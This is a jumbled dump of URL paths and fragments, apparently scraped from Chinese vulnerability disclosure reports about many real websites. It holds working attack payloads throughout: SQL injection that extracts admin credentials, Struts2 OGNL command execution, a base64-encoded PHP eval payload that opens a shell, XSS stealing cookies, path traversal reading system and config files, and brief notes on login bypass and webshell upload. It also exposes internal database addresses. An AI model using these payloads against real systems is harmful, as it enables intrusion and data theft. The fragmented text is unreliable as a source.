/member/buybook/manage6/otherinfo/e06/daochudata/ /index.php?doc-summary-xxxxxxxxx%27 /install/install.php?lang=888888888888/ /account/repass.php /questions.php?action=more&m=1 /UserCenter/HisOrderDetails.aspx?OrderId=610000 /member/list.php?modelid=10 /space/?userid=1 /goods/lists/53?filter%5B71%5D=%E7%94%B7%E5%A3%AB'and'1'='1 /goods/lists/53?filter%5B71%5D=%E7%94%B7%E5%A3%AB'and'1'='2 /manage/login.php /admin/index.php /admin/ /cgi-bin/gsps/v5/index.cgi /index2.php/home/viewforum/forum_id/11/sid/function.mysql-connect/40/page/function.include/ /index2.php/ www.shinewide.com www.shinewide.com /index.php?iaction=admin /Info.aspx?Guid=3e27e2be-e5d6-404a-b8e9-974dbd34f86c%27%20and%201=2%20union%20select%201,2,3,LoginID%20%2B%20%27|%27%20%2B%20pwd,5,6,7,8%20from%20Curcco_Login-- /admin/login.aspx /news_comment/ /t2.php?province=%BC%AA%C1%D6 /siteserver/installer/default.aspx 
/qiche11a36/wwwroot/admin/FCKeditor/editor/fckeditor.html /WEB-INF/config.xml /WEB-INF/ftpconfig/site.xml /web-services/services/ConfigBean /web-services/services/MembercenterBean /web-services/services/AuthorizBean /web-services/services/SiteChannelBean /web-services/services/SiteInfoBean /web-services/services/ProductBean /web-services/services/ContentBean /web-services/services/MembermoneyBean /web-services/services/MemberscoreBean /web-services/services/JobBean /web-services/services/ResumeBean /web-services/services/PublishBean /web-services/services/AdPlaceBean /web-services/services/UploadfileBean /web-services/ConfigBean?WSDL"/ /web-services/MemberBean?WSDL"/ /web-services/AuthorizBean?WSDL"/ /web-services/SiteChannelBean?WSDL"/ /web-services/SiteInfoBean?WSDL"/ /newsinarc/login.html /blogflag/admin/login.html /main.php?s=admin&a=login /iframe/login.php /auto/4s-admin/login.php /200704changcheng/admin/login.php?ccsForm=Login /main.php?s=admin&a=login /im?jsonp=parent.org.cometd.script._callback57&message=[{%22channel%22:%22/meta/connect%22%3E;%3Cimg%20src=e%20onerror=alert%281234%29%3E%22,%22connectionType%22:%22callback-polling%22,%22id%22:58,%22clientId%22:%221s1wcv8qe8ap74hddzu%22}]&1333160737516 /ddp.tar.gz /GB/content.php?nid=46 /game.aspx?code=1015盲注 sohu.com /css/.svn /info.php /user.php /test.sql /smallc.php?id=1%20and%201=2%20union%20select%201,concat%28user_name,0x7c,password%29,3,4%20from%20zoshow_adminuser /install.php /web.config /BC_addfunds.jsp /detail.php?itemid=21713 /index/business?c_b_sort=&c_b_area=&keyword=%E5%8C%97%% /index/business?c_b_sort=&c_b_area=&keyword=%E5%8C%97%% /ent-2003/editor/030620/030620-175366.html /admin /163.html /admin/ /upload.aspx /uploadfile.aspx /admin/ /nxbj/nxgjd/syzw.tar.gz /index.php?m=ability&c=index&a=lists&catid=2 / / 17173.com mysql_fetch_array() /wenwang/question/index.php vip.club.sohu.com/wenwang/question/include/dsn.php vip.club.sohu.com/wenwang/question/include/dsn.php 
vip.club.sohu.com/wenwang/question/include/dsn.php vip.club.sohu.com/wenwang/question/include/dsn.php vip.club.sohu.com/wenwang/question/include/dsn.php vip.club.sohu.com/wenwang/question/index.php vip.club.sohu.com/wenwang/question/index.php vip.club.sohu.com/wenwang/question/index.php /bbs/hangye/ php:126 tuan.pindao.com/db.sql tuan.pindao.com/.svn/entries style.xiu.com/robots.txt style.xiu.com/.bash_history /open.tar.gz /xqly/01.shtml board.news.17173.com/include/db.php board.news.17173.com/include/db.php /zt/ynz071015/index.shtml board.news.17173.com/include/db.php board.news.17173.com/include/db.php /leaveword/more.html board.news.17173.com/include/db.php board.news.17173.com/include/db.php /xqly/02.shtml /2010/12/sp1224/show.php Lost /2010/03/tl0316/index.php /2010/04/qnyh0401/index.php /2010/09/cqsn0901/show.php /2010/02/mhzx0209/mjoin.php /stock/blank/stockweekly10th.shtml /car/ajax/get_oiluse_info.php?subid=930 /upload.html /200909/jisi/data.php /main/Cgi/hdzq.php /main/Cgi/hdzq.php /order_pro_mody.asp?id=15746&ack=mody¤tpage=1072&Search_Domain_Name= www.dj894.com /wish_tree_others.php?id=9018 /.bash_history /speed_test.php.bak /repost/dort/ycTeLu88x?pos=zan&from=zan_testb&rl=0&st=3307 /repost/dort/被刷微博ID?pos=zan&from=zan_testb&rl=0&st=3307 /repost/dort/” /2004857.htm /ssl/download.php?path=aW1hZ2VzL2RsanluYi8yMDExLzAyLzEwL0VERTVDNDQzNzA2RTczRjhCOEE1MUIyOEQ4MUJBRjQ5LnBkZg== /download.html /chkuser.asp?jsoncallback=jQuery17103889010781044103_1333554006151&username=username&UserPassword=userpassword&cooklogin=0&t=1333554038560&_=1333554038566 /profile.asp?action=customerinfo1 /space-858582 /space-858582 /chkuser.asp?jsoncallback=jQuery17103889010781044103_1333554006151&username=username&UserPassword=userpassword&cooklogin=0&t=1333554038560&_=1333554038566 /mall/index.jsp 
/mall/fg/order/inputPhoneTobuy.jsp?productId=50v3&isMc=1&maketingCaseNo=300000818059%20&selectedColor=hg5r&huodong=%E8%B4%AD%E6%9C%BA%E9%80%81%E8%AF%9D%E8%B4%B9&dangci=500%E6%A1%A3&dangciId=4449&planCaseId=1029&gm_money=%C2%A50.1 / /left.jsp /cck.php?gid=281 /item.php?gid=312 /coremail/fcg/ldmsapp?funcid=readlett&sid=nAJcHTFziYRAMbTs&mid=1tbiEwEkBkV9AdrAoQAAsy%0A19%0A24%0A1&fid=1&ord=0&desc=1&start=0&fromsearch=1 /cgi/ldapapp?sid=nAJcHTFziYRAMbTs&tempname=options%2Frefuselist.htm&funcid=opuserattr&optype=set&refuselist=test%40test.com&update.x=1 /disservice.php?findid=9 /index.php?controller=flv&action=show&fid=4468%3C/u%3E /oauth/grant?client_id=cd271e3051444285b8a18f1211a095cd&redirect_uri=http://zone.ku6.com/u/17958620&response_type=token /u/17958620 /new4/messages/new@123****?id=127**** /test.php /space.php?uid=335465&do=blog&id=5932&fansid=1 /admin/frame.aspx / /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/ /FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector /login.aspx /f/m?tn=bdFIL&z=1287559916&word=%D1%CC%BA%AE%CB%AE&day=1&ntn=banid&un=%D1%CC%BA%AE%CB%AE&fid=1882952&pn=1&expand=&pinf=1__ /activity/activity_110601_02.html /usr/local/apache2/htdocs/zendamf_remote/:/usr/local/php/lib/php /activity/activity_110601_01.html /usr/local/apache2/htdocs/zendamf_remote/:/usr/local/php/lib/php 100% /im-client/imclient/selfHelp.action /home.php /home.php php /vehweb/ vehweb,使用此系统的单位还是不少的。源码有 /search_engine/search_knowledge_engine.php?tag=1&title=&classid=0&type=0&gjss=0&page=0&key=%25 /cnc/ / /sxj/WEB-INF/log4j.properties /sxj/WEB-INF/web.xml /sxj/WEB-INF/classes/com/homophobic/fairy/qq/servlet/WapAppServlet.class /sxj/log/sxj.log /txglj/new_info.jsp?id=55&info_no=4529 /ict/pages/Browser.jsp?sort=1&file=%2Fopt%2Ftomcat%2Fwebapps%2Fict%2Fict%2Fpages%2Fmadman.jsp /admin/admin_login.php?action=login 
/(http://www.cnec24.com/),后台管理:http://www.cnfc24.com/manage/,用户名密码'or'='or'直接射入后台。上传文件部分未对后缀名进行限制和过滤,直接可得到shell,服务器权限设置较为松散,多数重要的更新补丁也没跟上 /hm-web/m/welcome/login /ques.php?id=120 http://http://v.vnet.mobi //news_details.asp?id=98 /sites_details.asp?areaid=1 /?p=1&m=/../../../../../../../../../etc/passwd /?p=24&m=search&keyword=aaa%2527%20union%20select%201,2,3,4,username,6,7,pwd,9,10,11,12,13%20from%20shl_user%23 /qq.html /1esqxW /developer/listen /app2/mb_post2.php /video/assemble.php?type=6 /default.aspx /activedeta.aspx?active_id=99 /gc/index.php/index/searchconsignment/act/$%7B@print(md5(admin))%7D /cgi-bin/mobile_update_mood / www.wps.cn /extend/zh_cn/9luCih4CiWMQQQXZQYAXFQX7XJAUUXZ8w7ygWi/jsp/icp/user/ /extend/zh_cn/9luCih4CiWMQQQXZQYAXFQX7XJAUUXZ8w7ygWi/jsp/icp/user/js/CVS/Root /extend/zh_cn/9luCih4CiWMQQQXZQYAXFQX7XJAUUXZ8w7ygWi/jsp/icp/user/js/CVS/Repository /extend/zh_cn/9luCih4CiWMQQQXZQYAXFQX7XJAUUXZ8w7ygWi/jsp/icp/user/user_form.jsp /extend/zh_cn/a0Wna8AnaJCQaQXOKeqNVi3z3d1i93dqd1lous/jsp/business/register/ /extend/zh_cn/a0Wna8AnaJCQaQXOKeqNVi3z3d1i93dqd1lous/jsp/算是邮箱系统根目录吧 /FCKeditor/editor/filemanager/connectors/test.html尝试上传x.asp /fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2Fasp.asp&NewFolderName=Test%20Folder,成功在/Upfile/upload/file/下建立asp.asp目录 /2624717231/9c7201af35000wrr.html /2624717231/9c7201af35000wrr.html /fckeditor/editor/filemanager/connectors/test.html /CodeAward/admin/awardPeopleRule.aspx /online-crowdtest/%2F34766_folder.jsp /online-crowdtest/%2F34769_2008.php /app/newsDetail.action?headtodetailId=853 /data/tj/cups_detail.php?id=19 /Showbody.asp?c_NewsID=10701 /Signer/css.asp /njzq/xwzx/xwzq_template.jsp?docId=2399312 /a.jpg /admin.php / /admanager/www /cetvossFront/login.action /cgi-bin/scenario/save_scenario_v6 expression /new/news/BaseInfo9.jsp?nav=1&stockCode=600001'%20and%20exists(select%20*%20from%20dual)-- 
/new/news/BaseInfo9.jsp?nav=1&stockCode=600001'%20and%20exists(select%20*%20from%20dual)-- /new/news/BaseInfo9.jsp?nav=1&stockCode=600001'%20and%20exists(select%20*%20from%20dual)-- /new/news/BaseInfo9.jsp?nav=1&stockCode=600001'%20and%20exists(select%20*%20from%20dual)-- /new/news/BaseInfo9.jsp?nav=1&stockCode=600001'%20and%20exists(select%20*%20from%20dual)-- /new/news/BaseInfo9.jsp?nav=1&stockCode=600001'%20and%20exists(select%20*%20from%20dual)-- /wish/gotoWish.action /wish/gotoWish.action?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27\u0023rt.exit%281%29%27%29%28\u0023rt\u003d@java.lang.Runtime@getRuntime%28%29%29%29=1 /live/admin/index.php /1.php /111.php /1.php /adm/ /sys/login.html /xxx.jsp?id=xxx / /index.php/module/action/param1/${@phpinfo() /index.php/module/action/param1/${@eval%28$_POST[f]%29 / /cs/index.html /specapp/index.php/module/action/param1/${@phpinfo() /specapp/index.php/module/action/param1/${@eval%28$_POST[f]%29 /fahao/index.php?c=xin&m=content&accid=905 / /photograph/loginManage.do /ddedu/website/index.jsp /ddedu/website/index.jsp /Login.action /web/admin/index.jsp /login.php / / / /photograph/mainphoto_cut.jsp?gender=0&fromDate=2010-07-23&toDate=2010-07-24 /photograph/user_photos.jsp?userID=用户ID /admin/login.aspx /admin/login.aspx /admin/login.aspx /admin/login.aspx /admin/login.aspx /pub/ /login_list_goto_0.html?gname=%EF%BF%BD%EF%BF%BD%D2%B5%EF%BF%BD%EF%BF%BD%EF%BF%BD /h/1/236/aaa/$%7B@print_r($_SERVER)%7D /h/1/236/aaa/$%7B@print(get_cfg_var('disable_functions'))%7D 
/h/1/236/aaa/$%7B@eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKEVfQUxMKTskaGFuZGxlID0gcG9wZW4oJy9iaW4vc2ggLWMgJy4iJyRfUE9TVFt4XSciLicgMj4mMScsICdyJyk7ZWNobyAiJyRoYW5kbGUnOyAiIC4gZ2V0dHlwZSgkaGFuZGxlKSAuICJcbiI7JHJlYWQgPSBmcmVhZCgkaGFuZGxlLCAyMDk2KTtlY2hvICRyZWFkO3BjbG9zZSgkaGFuZGxlKTtkaWUoKTs'))%7D /web-console/ /trafficpolice/Yee/MessageInfo.aspx?xx_id=2012000003 cn:3307 cn:3307 /usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin /Code/Python/Python-2.6.7/3rd/site-packages/jinja2 special externals needs-lock /exec/pic_index.php?id=zhaozhenglong123 /modules.php?qp=1&name=zbpd&op=ybs&id=23&fid=3734 /?i=2410 /home /themes /plugins /config /core /index.php/index/index/1/$%7B$%7Bphpinfo()%7D%7D /?m=file&a=jump_to_s3&uid=UID&fid=FID cg_ProductShow.asp www.xxx.com/xx.asp?xx=xx / /act/cgi/mother/md?uid=1464029310 /tuanadmin /cgi-bin/qzshare/cgi_qzshare_urlcheck?url= /cgi-bin/qzshare/cgi_qzshare_urlcheck?appid=503&rappid=2&url= /cgi-bin/qzshare/cgi_qzshare_urlcheck?url=http%3A%2F%2Fwww.wooyun.org%2F www.zjump.cn /cgi-bin/qzshare/cgi_qzshare_urlcheck?appid=503&rappid=2&url=http%3A%2F%2Fwww.wooyun.org%2F /user/user.shtml /ad_manage.php /cgi-bin/custom/modify_custom_window.cgi,这个页面是用来修改QQ空间模块内容的。这里我选择提交的是FLASH模块。 title title swf /ac/c.gif.swf /ac/c.gif.swf /ac/c.gif.swf /qzone/v6/accessory/plugin/zoom.swf?onchange=QZONE.frontPageAccessory.zoomDetect.onZoomChange /qzone/v6/accessory/plugin/zoom.swf?onchange=alert /qzone/v6/accessory/plugin/zoom.swf?onchange=alert title title swf /ac/c.gif.swf\ /em/ /bin:/usr/sbin:/usr/bin /index.php /xqc/mlpxyy/mlpxcx_info.php?tid=1315967 /xqc/mlpxyy/mlpxqx.php / /cps/site/newweb/foreground/ /cps/site/newweb/ /cps/site/newweb/foreground/show1.php?id=1 / /robots.txt /jsp/fgsjj/detail_4_dd.jsp?id=101 /main/%BA%C3%B3%B52%CE%C4%BC%FE/ /search/yonex/?s=1 /index.php?act=show_store&id=2032&stc_id=9048 
/web/weblogin.do?returnUrl=http://ln.vnet.cn//login.xhtml?action=login&debug=command&expression=%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('netstat') /web/weblogin.do?debug=command&expression=%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('netstat') /web/consume.do?debug=command&expression=%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('netstat') /getMovieTrailer.xhtml?source=movie&mid=15800&channel=movie&callback=jsonp1334140128199 /guanggao/ad_tot.jsp?lid=10546%27%20AnD%20%27a%27%3d%27a&aid=vnet0101 /search.xhtml?crumb=1334140122040&name=%%27%20AnD%20%27%%27%3d%27&cid=-1 8080,用户名密码都是默认,直接上传war文件即可。 /用户名/profile /archives/167 /jmx-console /你的WAR包名字/你的马名字.jsp就可以了,一般权限很高哦 pijiu /admin/Session.asp /shop pijiu /search_flash.php?keyword=%E7%A9%8D%E6%9C%A8 /Scal.WebMaster/FileUpLoad/ /Customer/GetPassword.aspx /view/c587a8bd1a37f111f1855bf5.html /view/6a104f350b4c2e3f57276316.html /account/login?auth_str=值&url=http%253A%252F%252Fwww.dajie.com%252Fcard%252Fmaybeknow%253Ftrk%253Dforward / /wallpapers.php?id=downloads/wallpapers/ghostrider_wp02_standard.jpg / /test.txt uctest.ucweb.com /my_navi/manager/mynavclient/showmynav.php /discuzx2/ /wml/Download/uploadlimited/wap_camera.xhtml(文件上传漏洞) /json/ajax_get_mytaobao_try_item.htm?sexType=&callBack= /LDJAPP/zcfg/downloadfile.jsp?dest=201108050946274210.doc&src=附件一2011食品制造图表.doc /LDJAPP/zcfg/downloadfile.jsp?dest=aa/../201108050946274210.doc&src=附件一2011食品制造图表.doc /LDJAPP/zcfg/downloadfile.jsp?dest=../../WEB-INF/web.xml&src=web.xml /fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector /LDJAPP/zcfg/downloadfile.jsp?dest=../../search/ddyy/index.jsp&src=index.jsp /LDJAPP/zcfg/downloadfile.jsp?dest=../../WEB-INF/classes/com/trs/ldj/DBobj.class&src=DBobj.class 
/LDJAPP/zcfg/downloadfile.jsp?dest=../../WEB-INF/classes/com/trs/ldj/DatabaseConfig.properties&src=DatabaseConfig.properties oracle:thin:@192.168.1.202:1521:oracle /LDJAPP/zcfg/downloadfile.jsp?dest=../../search/ddyy/ddyy_01_outline.jsp&src=ddyy_01_outline.jsp /csibiz/csirp/guest/entprereg/login.jsp而该站点与下载点似乎不是一个站点,无法下载到其源代码 /LDJAPP/zcfg/downloadfile.jsp?dest=../../zcfg/downloadfile.jsp&src=downloadfile.jsp /fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector数据包,发现其实最终数据也是post到上面的.class类中。 www.bjld.gov.cn站点的Fckeditor路径即可 /LDJAPP//FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=file&CurrentFolder=/页面使用post请求上传文件即可。就简单用php写了一个小代码实现,选择一个文件,就会向指定的url中上传选择的文件,这样做主要是为了方便下次遇到在使用,所谓磨刀不误砍柴工。再者好久没有写代码了,当锻炼一下,否则有些太生疏了。 oracle:thin:@192.168.1.202:1521:oracle oracle:thin:@192.168.1.21:1521:oracle jtds:sqlserver://192.168.1.37:1433/middledata /forum-3206-thread-15301334835859518-1-1.html /forum-291-thread-18701334837491991-1-1.html /club/2010/lottery/jsonbaby.php?callback=?test /haodian/list/business?categoryId=1®ionId=0&address="/ /zhizhao/editlistyn2.asp?id=77 /pro_idc_fwqzy.php?t=1 /upload/201105162257279.asa / /index.php?doc-summary-xxxxxxxxx%27%20and%201=2%20union%20select%201,2,3,4,5,concat%28username,0x7c,password%29,7,8,9,0,1,2,3,4,5,6,7,8,9,0%20from%20wiki_user%20where%20groupid=4%23 /config/mobileconfig/index /gmis/xkjsb/dskyinfo/dskyInfoBs1.aspx?id=1 /gmis/dsphoto/1.asp /11.html?11 /11.html?11 /cgi-bin/bbs/author.cgi?author=test /cgi-bin/experience/exp_active_email?key=test&uid=test /item.htm?id=16868484866 /json/select_city.htm?callback=B"/ /sug?area=etao&code=utf-8&callback="/ /pc/ksf/getSnsCoin.do?callback=test /mob //mob /index.html?do=regsuccess&time=DH=kz-mid04&desturl=http://safddasdewq.3322.org/64?id=qwe /qyywx.php?news_id=50%20and%201=2%20union%20select%201,2,user(),database(),5,6,7,8,9,version(),11,12 
/app/friend/#/a/search/user/search/find.do?_input_encode=UTF-8&nick=xsser /a/register/passport/getNicks?callback=test /a/checkpassword/checkPassword?xpt=&vn=test /a/assistant/personal/get?xpt=&_=&vn= /a/app/discuss/newcount.htm?cb="/ /guest/count/count.do?type=0&xpt=&callback= /blogcount?l=1&vn= /page/category.do?action=recmdWidget&st=0&sz=15&vn= /app/friend/#/a/search/user/search/find.do?type=4&employer=%22/%3E%3Cscript%3Ealert%28/goderci/%29%3C/script%3E&_input_encode=UTF-8 /push_mail.jsp?b=126"/ /push_mail.jsp?b=126%22/%3E%3C/script%3E%3Cscript%3Ealert%28/goderci/%29%3C/script%3E&t=0 /push_mail.jsp?b=126"/ Announcement.asp?AnnounceId= /manager/index.php- /manager/login.php /ec/ /cgi-bin/weibotrip/trip.cgi?traveler=20 /cgi-bin/nw/photo/main.cgi?action=list&cat=480 /bison/commons/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/jsp/connector biz.weibo.com/adfront/deliver?psid=PDPS000000037700&wbVersion=v4w&uid=1763365093&callback= cnzz.cc/1.txt /BGMobileSrv/api/getOrderDetail.do?weblogId=96a116f69c7a6b644f4bc4d269bb4d3b%3AgRzVP&isHistory=0&terNo=000000000000000310260000000000&orderSn=120423405125 www.sina.com.tw /Search.shtml?cid=1&dis=[0-9.5]&ad=155%20order%20by%2017%23 /Search.shtml?cid=1&dis=[0-9.5]&ad=155%20and%201=2%20union%20select%200,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%23 /Child/playerlist.shtml?sort= /Ad/getAdPosListJs.shtml?position=175 /Ad/getAdPosListJs.shtml?position=175%29%20and%201=2%20union%20select%201,2,user%28%29%23 /Ad/getAdPosListJs.shtml?position=175%29%20and%201=2%20union%20select%201,2,concat%28user_id,0x7c,user_name,0x7c,%20email,0x7c,password%29%20from%20system_admin_user%23 /Ad/getAdPosListJs.shtml?position=175%29%20and%201=2%20union%20select%201,2,concat%28user_id,0x7c,email,0x7c,%20user_name,0x7c,password%29%20from%20user_users%20where%20user_name%20like%200x616161616161616263%20limit%201%23 /cgi-bin/profile/view.cgi?id=101459 /cgi-bin/wc2010/nw/photo/main.cgi?cat=1683 /cgi-bin/subject.cgi?id=3 
/cgi-bin/vote/index.cgi?cat=1 /cgi-bin/live/index.cgi?id=4740646 /cgi-bin/movie/mv/main.cgi?id=3515 /cgi-bin/vote/index.cgi?cat=1 /event/event.php?k=1 /joy?farm=1 /ebill/ajax/zoomElecBill.action?orgId=000000000000000&billId=000000000000 /fang/activities/getLotteryInfo.html?callback= /remote/citySearch.do?&callback={callback}&q=11111 /baidu/s?wd=%B8%EA%D1%C5%C9%F8%CD%B8%C2%DB%CC%B3&rsv_bp=0&inputT=6390 /poem/index.php?_c=admin&_a=list&type=poetry var /Goods/comments?good_id=556375&user_id=luj8848&order=%28case%0Awhen%281=1%29%0Athen%0Aadd_time%0Aelse%0Ais_help%0Aend%29%23 /Goods/comments?good_id=556375&user_id=luj8848&order=%28case%0Awhen%281=1%29%0Athen%0Aadd_time%0Aelse%0Ais_help%0Aend%29%23 /Ajax/adCodeInfo?time=0.7242165785281457&callback=jsonp1335235877318&adposid=175 /admin/adminMain.do /admin/login.php /admin/login.html /cgi-bin/admin/boardadmin/group_limit_list?groupid=20023&type=0&desc=0 /admin/ /barFindteBar.do /comment.php?id=962654 /list/positionList.php?positionId=791 /cio/list/positionList.php?positionId=806 /list/positionList.php?positionId=789 /list/positionList.php?positionId=790 /list/positionList.php?positionId=794 /list/node/index.php?nodeId=415 /list/list.php?nodeId=1801 /list/diy/index.php?nodeIdLevel2=267 /ucHome/space.php?do=mtag&tagid=3 /index.php/Content/detail/id/{${passthru($_GET[c])}}?c=id;uname /poem/index.php?_c=admin&_a=create&type=poetics /xiaoyi/survey.php?issubmit=3&pj=faq&u=http://help.163.com/special/sp/wlps_tips01.html&c=1&r=%E9%9D%9E%E5%B8%B8%E6%BB%A1%E6%84%8F /bugs/wooyun-2010-06130/trace/40c4cd8210b792d4b99811af4bfbe76e /test/ /club/list.action /info.php /s-hl1w6sgwpq3jv6gxk3tz23ovrtxc835spuv1h25mi6xw2o5wpq3jv6gxk2--1-48-80---3-4-3----2-2--128-0-0-PTAG,20084.2.2.html /5565117/0-0000000000-0-1-1-0-3-0-0-0/Ii8+PC9zY3JpcHQ+PHNjcmlwdD5hbGVydCgvZ29kZXJjaS8pPC9zY3JpcHQ+Xi0xXi0x/index.shtml /portal.php?byref=1&g_tk=1772478199&g_ty=lk&byref=1 www.17wo.com /LookMore.action这个路径下面 /manasys/aa /manasys/UserAdd 
/flash_upload.php?modelid=1%20and%20%28select%201%20from%28select%20count%28*%29,concat%280x7c,%28select%20concat%28username,0x7c,password%29%20from%20trx_member%20limit%200,1%29,0x7c,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1%29a%29%23 /more.php?class_id=39 /more.php?class_id=39%20and%201=2%20UNION%20SELECT%201,2,3,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29-- /.svn/entries / /ab.js /proxy%20v4.0/ /mstmap50007/g_adv_loc.jsp?cname=123&&curl=http://2651055qq.in/c10 /c10 www.118114.cn)注册登录之后,在用户资料--补充资料--头像上传, / /index.php?app=star&mod=Index&act=detail&s=66 /index.php?app=star&mod=Index&act=detail&s=66 /vipcenter/?src_key=myjy_lookedme&from=vipcenter-1″ /a8/ed/a72f543c8127e155728a0330609f/avatar_p.jpg” /a8/ed/a72f543c8127e155728a0330609f/avatar_p.jpg /反解出来的Id来进入妹子空间。 /反解出来的UId即可 /jiayuan/index.php?key=taylortai /include/fckeditor/editor/fckeditor.html /images/down.jpg/1.php /admin/admin.asp/ /see/view_point_detail/?task_ /seeQ/review_index/?taskid=23174&check_type= www.luckyair.net /cn/中国气象局国家气候中心存在SQL注入 /Website/index.php?ChannelID=3%20and%201=2%20union%20select%201,2,3,4,5-- /Website/index.php?ChannelID=3 /NewsCenter/NewsFile/News201204261832540.php /thread-2744369-1-1.html /user.php?act=act_login&username=xxxxx&back_url=http://shop.wanmei.com/goods.php?id=185 /config/ /lcExpertRegForm.xhtml?method=initReg /lcExpertRegForm.xhtml?method=initReg /zhuanti/comment/?ztid=44'&s=1 /zhuanti/comment/?ztid=44'&s=1 /search.php?searchType=&keyWords=%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&sid= /zhuanti/comment/?ztid=44&s= /dll/.svn/entries /?id=10328 /lib/ /demo/ /phpMyAdmin/ /lib/FCKeditor/editor/filemanager/browser/default/browser.html /wiki/imap/extensions/FCKeditor/fckeditor/editor/fckeditor.html /myinfo_unlogin.aspx /controls/fckeditor/ /dmwzweb/customer/successcase.aspx /i?tn=baiduimagedetail&ct=503316480&cl=2&lm=-1&istype=2&fr=ml2&pv=&ic=0&z=0&fmq=m11&s=0&word=流氓兔 
/admin/login /joinus.php?id=56注入 /v/list.action?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27\u0023rt.exit%280%29%27%29%28\u0023rt\u003d@java.lang.Runtime@getRuntime%28%29%29%29=1 /ptpRegisterAndLogin_add.action?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27\u0023rt.exit%281%29%27%29%28\u0023rt\u003d@java.lang.Runtime@getRuntime%28%29%29%29=1 /html/114/56731.html /)存在上传漏洞和目录遍历漏洞 /favicon/ /icbc/perbank/regtip.jsp@www.sina.com.cn/">http://www.icbc.com.cn/</a> www.sina.com(如果是钓鱼地址呢……) /lec/search?word= /search/none?word="/ /sanya/search/?wd="/ /bj/cklog.php?callback=baidu_s"/ /southservtudou.sql /specapp/Examples/examples.sql /specapp/Examples/Rbac/index.php/Public/login /specapp/Examples/Autoindex/index.php/Index/checkEnv/ /specapp/Examples/Form/ /specapp/Examples/Validate/ /specapp/Examples/Ajax/ /specapp/Examples/Page/ /specapp/Examples/CURD/ /specapp/Examples/Trace/ /specapp/Examples/Time/ /specapp/Examples/Db/ /specapp/Examples/Cache/ /specapp/Examples/Log/ /specapp/Examples/Log/ /specapp/Examples/Debug/ /specapp/Examples/File/ /specapp/Examples/View/ /specapp/Examples/Relation/ /specapp/Examples/Blog/ /tudou_api/ /mysql/ /cgi-bin/fillBill?sid=3&subject_id=aabbbb&embed=aaaaaaaaaa%22%3E%3Cscript%3Ealert%28document.cookie%29;openLogin%28%27http%3A%2F%2Fkf.qq.com%2F%27%29%3C/script%3E%3C!-- /.svn/entries /svn/websearch4/metazhidao/metazhidao_front/tags/apache.zhishi.20120306.a /svn/websearch4 1.0.250-top.baidu.com/zcache/zczche_adapter.class.php /detail.php?b=7&w=%BD%F5%D2%C2%D2%B9%D0%D0 /.svn/entries /chinaunix/trunk/code/china_gbk 
/chinaunix /chinaunix /chinaunix /chinaunix /chinaunix www.tenpay.com\/v2\// /admin/template/uploadFile.jsp / /uploadfile/virusup/diy.asp/20120428221403412.zip /so/q_%E5%92%B8%E9%B1%BC%22%3E%3Ciframe%20name="mypage"%20width=900px%20height=600px%20src="http://www.baidu.com /url?sa=t&rct=j&q=code+by+4lert&source=web&cd=6&ved=0CEYQFjAF&url=http%3A%2F%2Fsfda.qingdao.gov.cn%2Fdirectory%2Fweb%2FWS08%2Fimages%2F1276453391015.jsp&ei=qJWcT8_FJfGUiQeBg6XDDg&usg=AFQjCNEDw2DUuX1reg-0-hJjRsgSYgA9zA /directory/web/WS08/images/1276453391015.jsp cgi.meigui.qq.com /分站可直接写入一句话并连接成功 /ivod/i/home/VideoType.aspx?cid=88&typename=%E6%97%85%E6%B8%B8 /ivod/i/home/VideoType.aspx?cid=88&typename=%E6%97%85%E6%B8%B8 /i/sys/jump?un=hacker /house/web/Search_Result.php newhousesh.test.soufun.com/house/include/SystemDriver/MssqlDriver.php newhousesh.test.soufun.com/house/include/SystemDriver/MssqlDriver.php newhousesh.test.soufun.com/house/include/SystemDriver/MssqlDriver.php /admin/img/style/Style.css/1.php /admin/images/welcomebg.gif/1.php /market/zhongjie/admin/index.htm /account/verify_user.htm?param=D1DDE852C5863B3553&type=forgot_pwd /World.WebUI/DataModule/SendCheckCode.ashx?phone=你的手机号 /var/www/dede/member /register/gotoemail.php?email=xb@usa.com / //member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23@__admin`%20where%201%20or%20id=@ //member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@ /plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post /lol/images_m/php/get_image.php?file=a.gif 